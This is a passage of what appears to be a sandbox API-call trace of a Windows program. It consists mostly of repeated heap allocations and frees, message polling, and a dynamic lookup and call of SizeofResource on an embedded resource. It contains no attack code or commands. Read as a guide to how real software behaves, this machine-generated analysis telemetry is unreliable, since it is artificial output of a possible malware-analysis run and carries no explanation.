[0122.752] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8e0 [0122.752] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdc28 [0122.752] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa60 [0122.753] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef930 [0122.753] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdc40 [0122.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdc28 | out: hHeap=0x12c0000) returned 1 [0122.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa60 | out: hHeap=0x12c0000) returned 1 [0122.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdc40 | out: hHeap=0x12c0000) returned 1 [0122.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef930 | out: hHeap=0x12c0000) returned 1 [0122.753] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef940 [0122.753] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bda00 [0122.753] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef9f0 [0122.753] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef9a0 [0122.754] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdbb0 [0122.754] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bda00 | out: hHeap=0x12c0000) returned 1 [0122.754] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9f0 | out: hHeap=0x12c0000) returned 1 [0122.754] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdbb0 | out: hHeap=0x12c0000) returned 1 [0122.754] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0122.754] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x74650000 [0122.754] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdc58 [0122.754] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef900 [0122.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SizeofResource", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.755] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xf) returned 0x14bdb98 [0122.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SizeofResource", cchWideChar=15, lpMultiByteStr=0x14bdb98, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SizeofResource", lpUsedDefaultChar=0x0) returned 15 [0122.755] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb98 | out: hHeap=0x12c0000) returned 1 [0122.755] GetProcAddress (hModule=0x74650000, lpProcName="SizeofResource") returned 0x74668f80 [0122.755] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdc58 | out: hHeap=0x12c0000) returned 1 [0122.755] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0122.755] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff640 [0122.755] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efac0 [0122.755] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef9a0 [0122.755] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0122.755] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0122.756] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff640 | out: hHeap=0x12c0000) returned 1 [0122.756] SizeofResource (hModule=0x0, hResInfo=0xfe76a8) returned 0x65600 [0122.756] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa60 [0122.756] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x1302b30 [0122.756] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bdb98 [0122.756] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdaf0 [0122.756] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdbe0 [0122.756] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdb08 [0122.756] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef9e0 [0122.756] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb08 | out: hHeap=0x12c0000) returned 1 [0122.756] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9e0 | out: hHeap=0x12c0000) returned 1 [0122.756] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdbe0 | out: hHeap=0x12c0000) returned 1 [0122.756] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bda00 [0122.756] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdaa8 [0122.757] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdbf8 [0122.757] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef9a0 [0122.757] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdbf8 | out: hHeap=0x12c0000) returned 1 [0122.757] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0122.757] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdaa8 | out: hHeap=0x12c0000) returned 1 [0122.757] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdca0 [0122.757] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdad8 [0122.757] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdcb8 [0122.757] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efaa0 [0122.757] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdcb8 | out: hHeap=0x12c0000) returned 1 [0122.757] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efaa0 | out: hHeap=0x12c0000) returned 1 [0122.757] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdad8 | out: hHeap=0x12c0000) returned 1 [0122.758] FreeLibrary (hLibModule=0x74650000) returned 1 [0122.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8e0 | out: hHeap=0x12c0000) returned 1 [0122.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0122.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff258 | out: hHeap=0x12c0000) returned 1 [0122.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8e0 | out: hHeap=0x12c0000) returned 1 [0122.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef980 | out: hHeap=0x12c0000) returned 1 [0122.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7a8 | out: hHeap=0x12c0000) returned 1 [0122.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9b8 | out: hHeap=0x12c0000) returned 1 [0122.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd808 | out: hHeap=0x12c0000) returned 1 [0122.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd868 | out: hHeap=0x12c0000) returned 1 [0122.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7c0 | out: hHeap=0x12c0000) returned 1 [0122.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9a0 | out: hHeap=0x12c0000) returned 1 [0122.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd820 | out: hHeap=0x12c0000) returned 1 [0122.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd928 | out: hHeap=0x12c0000) returned 1 [0122.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6d0 | out: hHeap=0x12c0000) returned 1 [0122.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd838 | out: hHeap=0x12c0000) returned 1 [0122.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8b0 | out: hHeap=0x12c0000) returned 1 [0122.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd880 | out: hHeap=0x12c0000) returned 1 [0122.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8c8 | out: hHeap=0x12c0000) returned 1 [0122.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff208 | out: hHeap=0x12c0000) returned 1 [0122.759] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9e0 [0122.759] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8b0 [0122.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9e0 | out: hHeap=0x12c0000) returned 1 [0122.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8b0 | out: hHeap=0x12c0000) returned 1 [0122.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdaf0 | out: hHeap=0x12c0000) returned 1 [0122.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bda00 | out: hHeap=0x12c0000) returned 1 [0122.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdca0 | out: hHeap=0x12c0000) returned 1 [0122.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb98 | out: hHeap=0x12c0000) returned 1 [0122.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302b30 | out: hHeap=0x12c0000) returned 1 [0122.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa60 | out: hHeap=0x12c0000) returned 1 [0122.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0122.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd550 | out: hHeap=0x12c0000) returned 1 [0122.759] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.759] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff208 [0122.760] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd550 [0122.760] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa10 [0122.760] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8b0 [0122.760] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa10 | out: hHeap=0x12c0000) returned 1 [0122.760] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8b0 | out: hHeap=0x12c0000) returned 1 [0122.760] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd550 | out: hHeap=0x12c0000) returned 1 [0122.760] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff208 | out: hHeap=0x12c0000) returned 1 [0122.760] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.760] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0122.761] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0122.761] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.761] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff208 [0122.761] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd550 [0122.761] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8d0 [0122.761] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0122.761] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b98 [0122.761] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b98 | out: hHeap=0x12c0000) returned 1 [0122.761] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0122.761] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8d0 | out: hHeap=0x12c0000) returned 1 [0122.761] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd820 [0122.761] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff258 [0122.761] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef900 [0122.761] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8e0 [0122.761] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd820 | out: hHeap=0x12c0000) returned 1 [0122.761] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd550 | out: hHeap=0x12c0000) returned 1 [0122.762] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff208 | out: hHeap=0x12c0000) returned 1 [0122.762] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff258 | out: hHeap=0x12c0000) returned 1 [0122.762] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0122.762] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8e0 | out: hHeap=0x12c0000) returned 1 [0122.762] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.762] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c58 | out: hHeap=0x12c0000) returned 1 [0122.762] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.762] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9a0 [0122.762] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef980 [0122.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491ad8 [0122.763] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491ad8 | out: hHeap=0x12c0000) returned 1 [0122.763] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef980 | out: hHeap=0x12c0000) returned 1 [0122.763] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0122.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458dd8 [0122.763] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.763] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458dd8 | out: hHeap=0x12c0000) returned 1 [0122.763] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff208 [0122.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7a8 [0122.764] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef930 [0122.764] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa80 [0122.764] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a38 [0122.764] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9e0 [0122.764] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491918 [0122.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9e0 | out: hHeap=0x12c0000) returned 1 [0122.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491918 | out: hHeap=0x12c0000) returned 1 [0122.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a38 | out: hHeap=0x12c0000) returned 1 [0122.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0122.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef930 | out: hHeap=0x12c0000) returned 1 [0122.764] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7c0 [0122.764] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff258 [0122.764] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef920 [0122.764] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8b0 [0122.765] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7c0 | out: hHeap=0x12c0000) returned 1 [0122.765] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7a8 | out: hHeap=0x12c0000) returned 1 [0122.765] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff208 | out: hHeap=0x12c0000) returned 1 [0122.765] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff258 | out: hHeap=0x12c0000) returned 1 [0122.765] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef920 | out: hHeap=0x12c0000) returned 1 [0122.765] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8b0 | out: hHeap=0x12c0000) returned 1 [0122.765] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.765] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.765] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9f0 [0122.765] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef960 [0122.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918b8 [0122.766] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918b8 | out: hHeap=0x12c0000) returned 1 [0122.766] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef960 | out: hHeap=0x12c0000) returned 1 [0122.766] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9f0 | out: hHeap=0x12c0000) returned 1 [0122.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ed8 [0122.766] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.766] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ed8 | out: hHeap=0x12c0000) returned 1 [0122.766] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef910 [0122.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0122.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14919f8 [0122.767] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919f8 | out: hHeap=0x12c0000) returned 1 [0122.767] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0122.767] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef910 | out: hHeap=0x12c0000) returned 1 [0122.767] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458918 [0122.767] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.767] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458918 | out: hHeap=0x12c0000) returned 1 [0122.767] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.767] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0122.767] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9a0 [0122.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14919d8 [0122.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919d8 | out: hHeap=0x12c0000) returned 1 [0122.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0122.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0122.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ed8 [0122.768] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ed8 | out: hHeap=0x12c0000) returned 1 [0122.768] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efab0 [0122.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef960 [0122.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491af8 [0122.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491af8 | out: hHeap=0x12c0000) returned 1 [0122.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef960 | out: hHeap=0x12c0000) returned 1 [0122.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efab0 | out: hHeap=0x12c0000) returned 1 [0122.769] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ed8 [0122.769] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ed8 | out: hHeap=0x12c0000) returned 1 [0122.769] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.769] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9a0 [0122.769] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa10 [0122.769] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918f8 [0122.770] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918f8 | out: hHeap=0x12c0000) returned 1 [0122.770] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa10 | out: hHeap=0x12c0000) returned 1 [0122.770] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0122.770] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d18 [0122.770] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.770] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d18 | out: hHeap=0x12c0000) returned 1 [0122.770] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.770] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9c0 [0122.770] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9a0 [0122.770] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b78 [0122.770] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b78 | out: hHeap=0x12c0000) returned 1 [0122.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0122.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9c0 | out: hHeap=0x12c0000) returned 1 [0122.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ed8 [0122.771] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ed8 | out: hHeap=0x12c0000) returned 1 [0122.771] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef940 [0122.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa90 [0122.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491918 [0122.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491918 | out: hHeap=0x12c0000) returned 1 [0122.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa90 | out: 